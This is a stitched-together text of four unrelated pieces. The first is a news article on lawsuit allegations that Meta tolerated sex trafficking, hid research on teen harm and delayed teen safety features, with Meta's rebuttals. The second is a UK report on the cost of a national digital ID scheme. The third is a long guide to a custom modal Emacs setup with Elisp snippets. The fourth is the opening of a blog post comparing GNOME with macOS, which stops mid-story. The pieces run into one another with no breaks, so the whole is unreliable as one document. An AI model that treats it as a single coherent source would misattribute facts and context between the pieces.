Jayakumar was even more shocked to learn that Instagram had a disturbingly high tolerance for sex trafficking on the platform. According to the brief, she testified that Meta had a “17x” strike policy for accounts that reportedly engaged in the “trafficking of humans for sex,” meaning it would take at least 16 reports for an account to be deleted.
“Meta never told parents, the public, or the Districts that it doesn’t delete accounts that have engaged over fifteen times in sex trafficking,” the plaintiffs wrote.
A Meta spokesperson disputed this allegation to TIME, saying the company has for years removed accounts immediately if it suspects them of human trafficking or exploitation and has made it easier over time for users to report content that violates child-exploitation policies.
Allegation: Meta "lied to Congress" about its knowledge of harms on the platform
For years, plaintiffs allege, Meta’s internal research had found that teenagers who frequently use Instagram and Facebook have higher rates of anxiety and depression.
In late 2019, according to the brief, Meta designed a “deactivation study,” which found that users who stopped using Facebook and Instagram for a week showed lower rates of anxiety, depression, and loneliness. Meta halted the study and did not publicly disclose the results, stating that the research study was biased by the “existing media narratives around the company.” (A Meta spokesperson told TIME that the study was initially conceived as a pair of one-week pilots, and researchers declined to continue it because it found that the only reductions in feelings of depression, anxiety, and loneliness were among people who already believed Facebook was bad for them.)
At least one Meta employee was uncomfortable with the implications of this decision: “If the results are bad and we don’t publish and they leak,” this employee wrote, according to the brief, “is it going to look like tobacco companies doing research and knowing cigs were bad and then keeping that info to themselves?”
Indeed, in December 2020, when the Senate Judiciary Committee asked the company in a set of written questions whether it was “able to determine whether increased use of its platform among teenage girls has any correlation with increased signs of depression” and “increased signs of anxiety,” the company offered only a one-word answer: “No.”
To the plaintiffs in the case, the implication is clear: “The company never publicly disclosed the results of its deactivation study. Instead, Meta lied to Congress about what it knew.”
Allegation: The company knew Instagram was letting adult strangers connect with teenagers
For years
Instagram has had
a well-documented problem of adults harassing teens. Around 2019, company researchers recommended making all teen accounts private by default in order to prevent adult strangers from connecting with kids, according to the plaintiffs’ brief. Instead of implementing this recommendation, Meta asked its growth team to study the potential impact of making all teen accounts private. The growth team was pessimistic, according to the brief, and responded that the change would likely reduce engagement.
By 2020, the growth team had determined that a private-by-default setting would result in a loss of 1.5 million monthly active teens a year on Instagram. The plaintiffs’ brief quotes an unnamed employee as saying: “taking away unwanted interactions… is likely to lead to a potentially untenable problem with engagement and growth.” Over the next several months, plaintiffs allege, Meta’s policy, legal, communications, privacy, and well-being teams all recommended making teen accounts private by default, arguing that the switch “will increase teen safety” and was in line with expectations from users, parents, and regulators. But Meta did not launch the feature that year.
Safety researchers were dismayed, according to excerpts of an internal conversation quoted in the filing. One allegedly grumbled: “Isn’t safety the whole point of this team?”
“Meta knew that placing teens into a default-private setting would have eliminated 5.4 million unwanted interactions a day,” the plaintiffs wrote. Still, Meta didn’t make the fix. Instead, inappropriate interactions between adults and kids on Instagram skyrocketed to 38 times that on Facebook Messenger, according to the brief. The launch of Instagram Reels allegedly compounded the problem. It allowed young teenagers to broadcast short videos to a wide audience, including adult strangers.
An internal 2022 audit allegedly found that Instagram’s Accounts You May Follow feature recommended 1.4 million potentially inappropriate adults to teenage users in a single day. By 2023, according to the plaintiffs, Meta knew that they were recommending minors to potentially suspicious adults and vice versa.
It wasn’t until 2024 that Meta rolled out default privacy settings to all teen accounts. In the four years it took the company to implement their own safety recommendations, teens experienced billions of unwanted interactions with strangers online. Inappropriate encounters between teens and adults were common enough, according to the brief, that the company had an acronym for them: “IIC,” or “inappropriate interactions with children.”
A Meta spokesperson said the company has defaulted teens under 16 to private accounts since 2021, began defaulting teens under 18 into private accounts with the introduction of its Teen Accounts program, and has
taken steps
to protect users from online predators.
Allegation: Meta aggressively targeted young users
Meta feared young users would abandon Facebook and Instagram for their competitors. Acquiring and keeping young users became a central business goal. Meta CEO Mark Zuckerberg suggested that “teen time spent be our top goal of 2017,” according to a company executive quoted in the brief. That has remained the case, plaintiffs allege; internal company documents from 2024 stated that “acquiring new teen users is mission critical to the success of Instagram.” (A Meta spokesperson said time spent on its platforms is not currently a company goal.)
Meta launched a campaign to connect with school districts and paid organizations like the National Parent Teacher Association and Scholastic to conduct outreach to schools and families. Meanwhile, according to the brief, Meta used location data to push notifications to students in “school blasts,” presumably as part of an attempt to increase youth engagement during the school day. As one employee allegedly put it: “One of the things we need to optimize for is sneaking a look at your phone under your desk in the middle of Chemistry :)”.
Though Meta aggressively pursued young users, it may not have known exactly how old those new users were. Whistleblower
Jason Sattizahn recently
testified to Congress that Meta does not reliably know the age of its users. (Meta pushed back on Sattizahn’s testimony,
saying in a statement to NBC
that his claims were “nonsense” and “based on selectively leaked internal documents that were picked specifically to craft a false narrative.”) In 2022, according to the plaintiffs’ brief, there were 216 million users on Meta platforms whose age was “unknown.”
Federal law requires social media platforms to observe various data-privacy safeguards for users under 13, and Meta policy states that users under 13 are not allowed on its platforms. Yet the plaintiffs’ court filing claims Meta knew that children under 13 used the company’s products anyway. Internal research cited in the brief suggested there were 4 million users under 13 on Instagram in 2015; by 2018, the plaintiffs claim, Meta knew that roughly 40% of children aged 9 to 12 said they used Instagram daily.
The plaintiffs allege that this was a deliberate business strategy. The brief describes a coordinated effort to acquire young users that included studying the psychology and digital behavior of “tweens” and exploring new products designed for “users as young as 5-10.”
Internally, some employees expressed disgust at the attempt to target preteens. “Oh good, we’re going after <13 year olds now?” one wrote, according to the brief. “Zuck has been talking about that for a while...targeting 11 year olds feels like tobacco companies a couple decades ago (and today). Like we’re seriously saying ‘we have to hook them young’ here.”
Allegation: Meta's executives initially shelved efforts to make Instagram less toxic for teens
To combat toxic “social comparison,” in 2019 Instagram CEO Adam Mosseri announced a new product feature that would “hide” likes on posts. Meta researchers had determined that hiding likes would make users “significantly less likely to feel worse about themselves,” according to the plaintiffs’ brief. The initiative was code-named Project Daisy.
But after a series of tests, Meta backtracked on Project Daisy. It determined the feature was “pretty negative to FB metrics,” including ad revenue, according to the plaintiffs’ brief, which quotes an unnamed employee on the growth team insisting: “It’s a social comparison app, fucking get used to it.”
A similar debate took place over the app’s beauty filters. Plaintiffs claim that an internal review concluded beauty filters exacerbated the “risk and maintenance of several mental health concerns, including body dissatisfaction, eating disorders, and body dysmorphic disorder,” and that Meta knew that “children are particularly vulnerable.” Meta banned beauty filters in 2019, only to roll them back out the following year after the company realized that banning beauty filters would have a “negative growth impact,” according to the plaintiffs’ brief.
Other company researchers allegedly built an AI “classifier” to identify content that would lead to negative appearance comparison, so that Meta could avoid recommending it to vulnerable kids. But Mosseri allegedly killed the project, disappointing developers who “felt like they had a solution” to “a big problem.”
Allegation: Meta doesn't automatically remove harmful content, including self-harm content
While Meta developed AI tools to monitor the platforms for harmful content, the company didn’t automatically delete that content even when it determined with “100% confidence” that it violated Meta’s policies against child sexual-abuse material or eating-disorder content. Meta’s AI classifiers did not automatically delete posts that glorified self-harm unless they were 94% certain they violated platform policy, according to the plaintiffs’ brief. As a result, most of that content remained on the platform, where teenage users often discovered it. In a 2021 internal company survey cited by plaintiffs, more than 8% of respondents aged 13 to 15 reported having seen someone harm themselves, or threaten to do so, on Instagram during the past week.
A Meta spokesperson said the company reports more child sexual-abuse material than any other service and uses an array of tools to proactively find that content, including photo and video-matching technologies as well as machine learning. The spokesperson said human reviewers assess content flagged before it is deleted to ensure it violates policies, prevent mistakes that could affect users, and maintain the integrity of the company's detection databases.
Allegation: Meta knew its products were addictive, but publicly downplayed the harms
The addictive nature of the company’s products wasn’t a secret internally. “Oh my gosh yall IG is a drug,” one of the company’s user-experience researchers allegedly wrote to a colleague. “We’re basically pushers.”
Meta does not officially study addiction to its products, plaintiffs allege; it studies “problematic use.” In 2018, company researchers surveyed 20,000 Facebook users in the U.S. and found that 58% had some level of “problematic use”—55% mild, and 3.1% severe. But when Meta published an account of this research the following year, only the smaller number of users with “severe” problematic use was mentioned. “We estimate (as an upper bound) that 3.1% of Facebook users in the U.S. experience problematic use,”
wrote the researchers
. The other 55% of users are not mentioned anywhere in the public report.
Plaintiffs allege that Meta’s safety team proposed features designed to lessen addiction, only to see them set aside or watered down. One employee who helped develop a “quiet mode” feature said it was shelved because Meta was concerned that this feature would negatively impact metrics related to growth and usage.
Around the same time, another user-experience researcher at Instagram allegedly recommended that Meta inform the public about its research findings: “Because our product exploits weaknesses in the human psychology to promote product engagement and time spent,” the researcher wrote, Meta needed to “alert people to the effect that the product has on their brain.”
Meta did not.
This story has been updated to reflect additional comments from Meta.
UK minister ducks cost questions on nationwide digital ID scheme
A UK tech minister has declined to put a figure on the cost of the government's digital ID plans as MPs question the contributions expected from central departments.
Speaking to a House of Commons select committee this week, minister for digital government and data Ian Murray defended the government's decision not to publish budgeted costs of its plans to build digital IDs for every citizen.
In September,
the government announced
plans to issue all legal residents a digital identity by August 2029, which in the first instance is set to be used to prove eligibility to work. Prime minister Keir Starmer said digital IDs were "an enormous opportunity for the UK." As well as making it tougher to work illegally, they would also "offer ordinary citizens countless benefits, like being able to prove your identity to access key services swiftly," he said.
The plan is to use smartphones to store digital IDs and build on existing work to introduce a government digital wallet including driving licenses.
Appearing before the Science, Innovation and Technology Committee this week, Murray said budgets for the project had yet to be determined, although the technical delivery will be managed by the Government Digital Service (GDS), within the Department for Science, Innovation and Technology (DSIT).
"In terms of the cost [it is to] be determined by what the system looks like, and that can only really be measured after the consultation has been closed and analyzed," he said.
Murray said those initial costs would come from the DSIT settlement in the spending review period, although other departments will be expected to contribute as use cases are produced.
"The cost of the entire system will depend on what the system looks like," he said. "Digital inclusion, all the bits that are attached to digital ID, and also the use cases from other government departments in terms of both the cost of having the system, the cost of running the system, and the savings that are subsequently made from having a much more efficient system."
Kit Malthouse, Conservative MP and committee member, questioned whether departments expected to contribute would be able to protect that funding.
"We may be in a position then where the home secretary says, 'Right, you're asking for £500 million for this thing that may yield savings. But you know what? That's £500 million. I'd have to take from policing or border security, so I don't want your service. Thanks very much. Go and look elsewhere.' The delivery of it will be down effectively to negotiation with departments," he said.
Murray responded that the digital ID scheme was "the prime ministerial priority, and therefore GDS, in terms of digital ID, will build the system under the monitoring and policy development of the Cabinet Office."
Meanwhile, the minister said his department had decided not to appoint another chief digital officer (CDO) to replace the outgoing Joanna Davinson, who was interim CDO from December 2024 to September 2025, a post she had
previously held
on a permanent basis. The responsibilities would now become part of the role of the permanent secretary, the most senior civil servant in the department.
"Keeping these issues at permanent secretary level is the way to get a cross-government approach to it," he said.
However, committee chair Chi Onwurah questioned whether the permanent secretary would necessarily have the experience of digital transformation needed for the CDO role.
When you write code, you want to focus on the code, not on the text
of the code. This means a) you have to have a good text editing setup,
and b) you need to have a muscle-memory level instinct for using that
setup. The second comes with practice and with
consistency
(i.e. not changing your config too much too quickly). The first is what
I will talk about here.
This document is meant for people who are current users of, or at least slightly familiar with, Emacs. I won’t spend much time explaining Emacs basics - for example, how incremental search or compilation buffers work (I would recommend Mastering Emacs for that). But I will give rationales for the choices I’ve made in encouraging or discouraging certain patterns.
You can read this in two ways: as the general Emacs commands I use to edit the text of programs efficiently, and as the specific keybinds I use in my modal ‘command’ mode to make those commands as convenient as possible.
No Mouse, No Arrows
All text editing practices rely on minimising the work your fingers
do by minimising the number of keystrokes and keeping your fingers as
close to the home row as possible. This means no arrow keys and no
mouse. This can be enforced by remapping your arrow keys to
ignore
, and by installing the package
disable-mouse
.
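For example, a minimal sketch of what that can look like in an init file (the disable-mouse package comes from MELPA, and the exact name of its global mode may vary slightly between versions):

;; Send the arrow keys to the 'ignore' command so they do nothing.
(dolist (key '("<up>" "<down>" "<left>" "<right>"))
  (global-set-key (kbd key) 'ignore))

;; Turn the mouse off everywhere (provided by the disable-mouse package).
(global-disable-mouse-mode 1)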
Modal Editing: Command and Insert Modes
Editing code is different from writing prose in that you spend a lot
more time moving around the document, and moving things around
in
the document, than actually writing text. The actions for
moving are more important than the actions for typing, and should
therefore be closer to hand. This is the premise of
modal
editing
: the “default” actions of most keyboard keys are to move,
not to type. For example in the default ‘mode’, hitting ‘a’ doesn’t type
the ‘a’ character, it moves the cursor to the start of the line. To
actually type things, you need to hit a special key which puts you in
‘insert’ mode. Then when you are finished typing, you hit another key
which puts you in the default (or ‘command’) mode.
My modal system is custom written and very lightweight - about 150 lines, not including the keybinds themselves. I recommend using a modal system, if not mine then someone else’s, such as Evil or Meow. But if you really dislike them, you can still do everything I describe here in vanilla Emacs, and most of the commands already have default keybinds. There are only four ‘custom’ functions I use: the half-page scrolls and the kill-whole-word/sexp. All are very simple, as sketched below.
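For illustration, here is one way those four helpers could be written. This is a sketch of the idea; the function names are illustrative, not the exact ones from my config:

;; Half-page scrolling that keeps the cursor line centred in the window.
(defun my/half-page-down ()
  "Move down half a window and recenter."
  (interactive)
  (forward-line (/ (window-body-height) 2))
  (recenter))

(defun my/half-page-up ()
  "Move up half a window and recenter."
  (interactive)
  (forward-line (- (/ (window-body-height) 2)))
  (recenter))

;; Kill the whole word or sexp the cursor is currently inside,
;; rather than killing forward from point.
(defun my/kill-whole-word ()
  "Kill the word at point."
  (interactive)
  (forward-word)
  (backward-word)
  (kill-word 1))

(defun my/kill-whole-sexp ()
  "Kill the sexp at point."
  (interactive)
  (forward-sexp)
  (backward-sexp)
  (kill-sexp 1))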
A note on defaults
A problem with customised setups is that they mean you can’t pick up
your friend’s Emacs setup and use it, because your muscle memory will
cause you to hit all the wrong keys. This effect can be mitigated by
sticking with the ‘language’ of the system. Emacs has pretty clear (if
arguably not very good) conventions for most of its keys:
f
means forward,
n
means next,
C-g
is always ‘cancel’. My setup tries to stick with these
conventions as much as possible.
f
in command mode is
‘forward-word’.
n
is ‘next line’.
Additionally there is basically no remapping
for insert
mode
. The idea being that editing in a vanilla Emacs is the same as
editing using only insert mode in my setup. I find that you spend a fair
amount of time navigating from
within
insert mode even in my
setup, so you won’t lose your muscle memory.
Leaders
The most common actions for moving around the screen are on a single
keystroke on command mode. For example, to go to the next line, you hit
n
. To go forward by a word, press
f
.
Less common, but still important commands are usually two or three
keystrokes. For example, save file is
vs
. Kill word is
kf
. In these cases, the first key is a ‘leader’ key. I use
a few leader keys (a configuration sketch follows this list):
v
: A general leader key, but mostly for file, buffer
and window operations.
k
: Kill leader: most of the kill commands are under
this.
s
: Search leader: most searches are under this
vp
: Project leader: contains several operations that
are useful when working on a ‘project’ that consists of many files,
which is very common with programming projects.
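In Emacs terms, a leader is just a prefix keymap. A hedged sketch of how the k and s leaders might be wired up, assuming your modal system exposes a command-mode keymap (my/command-mode-map is a stand-in name for this example):

(define-prefix-command 'my/kill-map)
(define-prefix-command 'my/search-map)

;; my/command-mode-map stands in for whatever keymap your modal system
;; activates in command mode.
(define-key my/command-mode-map (kbd "k") 'my/kill-map)
(define-key my/command-mode-map (kbd "s") 'my/search-map)

;; A few of the bindings mentioned in this document:
(define-key my/kill-map (kbd "f") 'kill-word)         ; kf: kill forward word
(define-key my/search-map (kbd "o") 'occur)           ; so: occur
(define-key my/search-map (kbd "q") 'query-replace)   ; sq: query-replace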
Getting in and out of insert mode
To transition from command to insert mode, press
i
. To
transition from insert to command mode, press
C-j
.
There are a few more ways to get into insert mode:
I
: Insert after character
O
: Insert in overwrite mode (overwrite mode will be
cancelled when you return to command mode)
A
: Insert at start of (indented) line
E
: Insert at end of line
C-RET
: Newline and insert
S-RET
: Newline above and insert
Moving Vertically
I recommend you set up relative line numbers, and global-hl-line-mode
so you can clearly see which line your cursor is on and how far away
each line is.
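Both are built in, so something like this in your init file is enough:

(setq display-line-numbers-type 'relative)  ; show line numbers relative to point
(global-display-line-numbers-mode 1)
(global-hl-line-mode 1)                     ; highlight the current line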
In command mode press
n
to move to the next line, and
p
to move to the previous line. Often they will be used in
conjunction with a numeric prefix: type
12n
to move down 12
lines. This number-prefix pattern is general: you can do most commands
multiple times by typing digits before typing the command.
r
moves up by a half page, and
t
moves down
by a half page while keeping the cursor line in the middle of the
screen. These are used in preference to the usual
scroll-up
and
scroll-down
commands, which move so much you have to
spend a second reorienting.
Two useful and related actions are
recenter-top-bottom
and
move-to-window-line-top-bottom
. These are bound to
l
and
L
respectively.
l
moves the
screen around the current highlighted line - first centring the screen
around the hl-line, then putting the hl-line at the top of the screen,
then at the bottom. It’s best to just try it out.
L
is sort
of the opposite, it moves the
cursor
around the screen, first
to the center, then to the top, then to the bottom.
.
and
,
are ‘beginning-of-defun’ and
‘end-of-defun’. You can think of these as moving by a top level ‘block’.
These are usually pretty useful, but depend on your language mode having
a good definition for what a ‘block’ is.
Less often used, but occasionally useful, are
<
and
>
for moving to the beginning and end of the current
buffer.
Moving Horizontally
Moving horizontally is important, but when programming you should
really avoid using these commands too much in favour of moving in larger
syntactic units - see the later sections on moving by expression and
search.
You should turn on subword mode:
(global-subword-mode 1)
When moving horizontally, try to move in as large a unit as you can.
You should almost never move left or right by an individual character.
The smallest general unit is a “word” - similar to how most editors will
use
Ctrl-Right
to move right by a word. To move forward by
a word, press
f
. To move backward by a word, press
b
.
The definition of a ‘word’ in Emacs can be a bit tricky, especially
when it comes to programming.
foo_bar_baz
is
three
words.
fooBarBaz
(if you’ve got subword mode turned on) is
also three words. So for either of these, if your cursor is on the
f
of
foo
, pressing
f
to go
forward will put you before the
bar
symbol. This is handy
for changing things within a long variable name. But it’s not great for
rapid navigation. Which is why I recommend moving by
expression
over moving by
word
.
If you must move by a single character, use
C-f
and
C-b
respectively.
e
moves to the end of the current line.
a
moves to the start of the current line, but generally you should prefer
m
, which moves to the first non-whitespace character of the
line - which is usually what you want when programming. However, if I’m
trying to move to the start or end of a line, it’s usually because I
want to type something there. And for doing that you can use
A
and
E
respectively, which will move to the
start or end of the line and immediately enter insert mode.
This is it for moving strictly within a line. But for the various reasons outlined above, you really shouldn’t use these too much.
There are better ways to move within a line: moving by expression and
moving by search.
Moving by Expression
S-Expressions, or Sexps, are a big thing in lisps and therefore in
Emacs. Most programming languages are syntactically ‘blocks’ of symbols
enclosed in different bracket types. Many use curly braces to denote
execution blocks - function bodies, loops, structure definitions -
square brackets to denote arrays, and parentheses to denote
parameter/argument lists. All fit the s-expression definition. When
you’re moving around a program it can be useful to think in terms of
jumping in to, out of, over, or within those blocks. Emacs has lots of
commands for this, and there are extensions which add even more, but I
really only use four.
j
moves forward by a sexp. If the cursor is over an
opening bracket of any kind, pressing
j
will jump
over
that whole block.
h
will do the same thing,
but backwards. This can effectively be used as a ‘jump to matching
bracket’ command.
If on a non-bracket character, these will jump forward or back by one
syntactic symbol. This should generally be preferred to moving by
word
because in most cases when programming you want to jump
over the symbol, not the word. For example, if you are at the start of the
variable name
foo_bar_baz
, unless you want to change
something in that variable, you probably want to jump over the whole
thing.
j
will do that, whereas
f
will jump you
to
bar
.
The other two I use are ‘down-list’ (
d
) and up list
(
u
). These jump
into
and
out of
a block.
For example if my editor looks like this, where
|
is the
cursor position:
dele|te(state.im_temp_entity_buffer)
, and
I hit
d
, the cursor will be moved into the next block - in
this case the argument list for delete:
delete(|state.im_temp_entity_buffer)
. Pressing
u
will move the cursor
out
of that list:
delete(state.im_temp_entity_buffer)|
. This works on any
type of brackets. These can also be used with a negative argument
(e.g.
-d
) to go
back
into and
back
out of
an expression. You can reverse the above sequence with
-d
,
resulting in
delete(state.im_temp_entity_buffer|)
, and then
-u
resulting in
delete|(state.im_temp_entity_buffer)
.
Using these sexp expressions when programming is usually far more
effective than using the horizontal movements like ‘forward-word’, and
you should get into the habit of preferring them.
Moving by Search
Sexps are great, but really the best way to move more than a few
words around your buffer is to move by searching for the string of text
you want to jump to. If the location you want to jump to is on the
screen, this creates a sort of ‘look at, jump to’ dynamic, where you
find where you want your cursor to be with your eyes, type some of the
text at that location, and your cursor is now there. But it also works
great if the location you’re looking for is off the screen.
The simplest commands are the usual ‘isearch-forward’ and
‘isearch-backward’. The mappings for these are unchanged from standard
Emacs:
C-s
and
C-r
. There are packages which
provide alternative versions of this - ‘jump-char’ and ‘avy’, for
example - but I find these work fine.
Sometimes you’re searching for something that is pretty common, and
using incremental search is a slog. In this case, you can use occur,
with
so
, which creates a buffer with all the instances of
the search term, hyperlinked so you can easily jump to that
location.
How to use occur is not specific to my setup, but it is very useful to
learn, so I’ll go into some detail. When you are in an occur buffer:
M-n
and
M-p
will move up and down, but
won’t
jump the original buffer to the relevant line
n
and
p
will do the same, but it
will
update the original buffer to show the line
M-g M-n
and
M-g M-p
will not only update
the original buffer to show the selected line, but it will make the
original buffer active at that location. A bit hard to explain in words,
but it’s very useful, try it out.
The other useful thing about occur is that, while it’s read only by
default, you can make it editable with
e
. And from here you
can edit
the original buffers
from in the occur window. Huge.
Get back to read-only mode with C-c C-c.
You can also create an occur window for multiple buffer with
multi-occur-in-matching-buffers
. But I find that a bit
fiddly. What I would really like is a ‘project-occur’ which searches for
all instances of a term in the current project. Emacs doesn’t have
that built in as far as I’m aware, though I believe the common
‘projectile’ external package has something like it. I use the ‘ag’ package and the
silver searcher search program to search project-wide for terms, but it’s not ideal.
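For what it’s worth, a rough sketch of the ‘project-occur’ idea is possible with the built-in project.el (Emacs 27+). This is not part of my setup, just an illustration, and it visits every project file, so it can be slow on large repositories:

(require 'project)
;; Sketch only: run multi-occur across every file in the current project.
;; Visiting each file with find-file-noselect is simple but heavyweight
;; compared to a proper grep/ag-based search.
(defun my/project-occur (regexp)
  "Show an occur buffer for REGEXP over all files in the current project."
  (interactive (list (read-regexp "Project occur: ")))
  (multi-occur (mapcar #'find-file-noselect
                       (project-files (project-current t)))
               regexp))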
Registers and the Mark
Another way to quickly jump around a buffer is to use registers.
These are short-lived ‘bookmarks’, which you can set and return to.
Typically I’ll use these when I want to temporarily jump to another
location from a point I’ll want to return to afterwards. For example,
jumping into a function from the calling location, then back out to the
calling location. Typically I’ll hit
v SPC a
to set my
current location to the register
a
. Then jump to the other
place. Then when I’m done,
vja
will take me back to my
original location. If I want to chain these together, I’ll use the
registers a, s, d and f as a sort of ‘stack’. Often I’ll also want to jump between
two locations repeatedly, so I’ll set them up as
a
and
s
.
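These bindings presumably wrap the standard register commands; in vanilla Emacs the same round trip looks like this:

(point-to-register ?a)  ; C-x r SPC a -- remember the current location as register ‘a’
;; ... jump somewhere else, do some work ...
(jump-to-register ?a)   ; C-x r j a   -- return to the saved location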
An alternative way to get the above behaviour is to use the
‘mark’ as a very transitory, but automatic, register. When you do most
‘jumps’ in emacs, e.g. using isearch, a temporary register called the
‘mark’ is created in the place you jumped from. Or, you can set it
manually using
gg
. Then, you can jump to that mark
(resetting it to the place you jumped from in the process) with
C-x C-x
. This is like the
a
and
s
pattern I described above, but with the advantage that
you don’t have to set the register yourself. You can also ‘pop’ the mark
by hitting
C-u g
. And you can do this repeatedly by hitting
C-u g g g
. The downside is that the mark is less
permanent than the registers, so you can accidentally set it to something
else, and you’ll find your jumps will take you somewhere you don’t
expect, which is disorienting. For that reason I usually use manual
registers.
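For reference, vanilla Emacs can do the same repeated popping with C-u C-SPC followed by plain C-SPC presses, provided this variable is set:

(setq set-mark-command-repeat-pop t) ; let repeated C-SPC keep popping the mark ring after C-u C-SPC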
Find and replace
While you can use occur mode to do find-replace, generally it’s
easier to use
sq
(query-replace). This is both standard
Emacs functionality and works basically the same as other editors’
find-replace, so I won’t go into how it works.
A variant on that is
vpq
, which is
project
query-replace. It works the same way, but runs through every file in
your project, not just the current buffer.
Killing, or Cut Copy Paste
In the hierarchy of importance of operations in program text editing,
moving around the buffer is top, cut/copy/paste is second, and typing is
third.
We’ve seen that there are lots of options for moving around the
screen using different syntactic units. Moving and ‘killing’ (as Emacs
calls the operation that is usually called cut) are sort of ‘twinned’:
for each move, there is usually an equivalent kill. And in my setup they
are, where possible, on the same keys, just with a
k
prefix.
So
kf
is kill forward word,
kj
is kill
forward sexp. A full list is below, but if you just think about how you
move by a certain amount, you can usually get the equivalent kill
function this way.
There are a few special cases for kills though. While there is
kf
for kill forward word and
kj
for kill
forward sexp, often what you want to do is kill the whole word/sexp
you are currently in
. These are the
ki
(kill whole
word) and
kn
(kill whole sexp) commands. Similarly,
ke
will kill from your point to the end of the line, but
more often you will want to ‘kill whole line’
kl
.
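Neither ‘kill whole word’ nor ‘kill whole sexp’ is a stock Emacs command, so as an illustration (not the actual implementation behind ki and kn), here is one way such commands could be written on top of thingatpt:

(require 'thingatpt)
;; Illustrative sketch: kill the whole thing point is currently inside,
;; using thingatpt to find its boundaries.
(defun my/kill-whole-thing (thing)
  "Kill the THING at point, e.g. the symbol `word' or `sexp'."
  (let ((bounds (bounds-of-thing-at-point thing)))
    (when bounds
      (kill-region (car bounds) (cdr bounds)))))

(defun my/kill-inner-word () (interactive) (my/kill-whole-thing 'word))
(defun my/kill-inner-sexp () (interactive) (my/kill-whole-thing 'sexp))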
A convenient (though often inefficient) thing to do is kill all the
text in a highlighted region. You can do this with kw (kill region). Or you can copy a region with ks (kill ring save).
You will often find yourself wanting to kill from your cursor up to a
certain character. Emacs calls this a ‘zap’, and you can do it with
kz
(zap to character).
Finally, if you find yourself wanting to join the current line with
the line above it,
k6
will do that.
To paste, just hit
y
(for yank).
Here is the full list of kill commands.
kf    kill word
kb    kill back
kj    kill sexp
kn    kill inner sexp
kh    kill sexp back
ke    kill to end of line
kl    kill whole line
kw    kill region
ks    kill ring save
k6    join line
kr    kill rectangle
kz    zap to character
ki    kill inner word
File and window operations
When programming you spend a lot of time jumping between files and
buffers within the ‘project’. The project usually being defined as the
root of the source repo.
Most of these operations are mapped with the
v
leader
key, and in the case of commands that operate on the whole project,
vp
. None of them are particularly unusual, so I’ll just
list them:
Window commands
w     delete other windows
o     other window
v1    delete other window
v2    split window below
v3    split window right
File commands
vf     find file
vpf    project find file
vs     save file
vps    save project files
vr     recent files (requires some custom setup)
vd     dired
vpd    project root dired
Buffer commands
vk     kill buffer
vpk    project kill buffers
vb     switch buffer
vpb    project switch to buffer
Other useful things that don’t fit anywhere else
Macros are surprisingly usable in Emacs, though they are something of
an art.
v[
starts defining a macro,
v]
ends
it.
vm
applies the macro. You can apply it repeatedly with
vmmmmm...
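Those bindings presumably sit on top of the standard kmacro commands; a self-contained sketch with a hypothetical prefix map:

(defvar my-macro-map (make-sparse-keymap)
  "Hypothetical stand-in for the v-prefix map used above.")
(define-key my-macro-map (kbd "[") #'kmacro-start-macro)        ; begin recording
(define-key my-macro-map (kbd "]") #'kmacro-end-macro)          ; stop recording
(define-key my-macro-map (kbd "m") #'kmacro-end-and-call-macro) ; run the last macro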
LSPs, via the Emacs LSP implementation eglot, are something of a mixed
blessing in my experience. I usually keep eglot turned off. But sometimes
being able to use ‘xref-find-definition’ (
M-.
) and the
improved tab completion is too useful to ignore.
‘comment-line’
;
I use all the time. If you have a
region highlighted, it will comment out the region.
/
for ‘undo’,
v\
for whitespace cleanup.
q
for ‘fill or reindent’ will usually tidy the formatting
of whichever block you’re in.
x
is ‘execute command’.
z
is repeat.
Rectangle editing is often useful. Highlight the region you want to
edit, and then
kr
to kill it, or
vt
to replace
the rectangle with the thing you type. I find this works for most cases
where I would use multi-cursor in other editors.
vv
opens the VC interface (magit, in my case).
I tend to use
sh
to highlight a phrase in a certain
colour when I want something I’m currently working on to show up
clearly.
vi
for imenu, and
vI
for imenu-to-buffer
are reasonable ways to browse your code by ‘section’, provided the
major-mode implements it properly.
I disable a bunch of commands I sometimes hit accidentally with
unpleasant consequences, most annoyingly the two ‘suspend’ shortcuts
C-z
and
C-x C-z
.
Non-editing Configuration
I have some other stuff in my configuration apart from the above
keybindings. But most of it is either very common (fixing where
temporary files are saved), or very specific to how I like to do things
and not good general advice. For example I turn off transient mark mode,
but I wouldn’t recommend it generally.
Tab completion can be a pain to get set up how you like it. I have a
setting that works for me, but it’s not perfect.
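As an assumption about what such a setting might look like (not necessarily the one used here), a common baseline is to make TAB indent first and then complete:

(setq tab-always-indent 'complete) ; TAB indents, and completes if the line is already indented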
I
would
recommend relying on as few external packages as
possible. I use, and would recommend, these ones:
ag
: an interface to the silver searcher search program.
This is a way to search for a term across a whole project. grep is a
reasonable alternative, but I prefer the silver searcher. Use it with sa.
diff-hl
: A utility for highlighting lines that have
changed since your last commit.
magit
: makes using git bearable (or possible, for
things like rebasing)
visible-mark
: indicate visually where the ‘mark’
is.
And a couple of other, language specific ones.
Why not vim?
No reason other than I’m used to emacs. There’s nothing here you
couldn’t equally do with vim.
Recently, I bought my first-ever MacBook.
I’ve spent some time with it, and I gotta say - despite all that hot garbage that is thrown at GNOME for being an OSX clone, GNOME does the job better than I’ve expected, and certainly better than Apple.
In some areas, that is.
Good old days of Linux
A bit of a backstory.
I’ve been using GNUplusSlashLinux for more than fifteen years.
Most of the time, I used GNOME, starting from GNOME2, moving to Unity maybe for two years, then GNOME Shell, then KDE Plasma 5 for another two years, and switched back to GNOME Shell again.
I’m not mentioning some of my at most month-long forays into other
DEs, like XFCE, or tiling WMs, because they never stuck with me.
So I’ve been there for most releases of GNOME Shell, followed them closely, even used to run Ubuntu GNOME when GNOME Shell became a thing, until it became the default in Ubuntu once again.
Though by that time, I had already moved from Ubuntu to a different distribution for a variety of reasons.
I wasn’t always satisfied with GNOME, and was a fair bit vocal about it in the past - I even got myself banned from the r/gnome subreddit for shitting on it too much.
That’s why I experimented with other desktop environments, particularly Unity and KDE.
Unity felt like a breath of fresh air after GNOME2, mostly because Canonical took the years people had spent trying to make GNOME2 more OSX-like and made decent steps in that direction.
A global menu, HUD, blur, buttons on the left - you name it, it was there.
Granted, it wasn’t an OSX clone - rather, it was its own thing, and I still remember Unity days fondly.
I switched to GNOME Shell almost as soon as it was released as the Ubuntu GNOME spin, and while it was a bit janky, Unity had started to lose steam, and GNOME looked like the hot new thing.
Figure 1:
Anyone else remember that wallpaper? GNOME sure has come a long way
I did, however, run Unity on my older PCs, as it was far less taxing on resources than early versions of GNOME3, but then it was discontinued, and the long-awaited Unity 8 with Mir never became a thing.
So, when I was fed up with GNOME being a resource hog, often crashing, and moving towards Wayland, which didn’t work as well as advertised, I decided to try KDE somewhere around 2018.
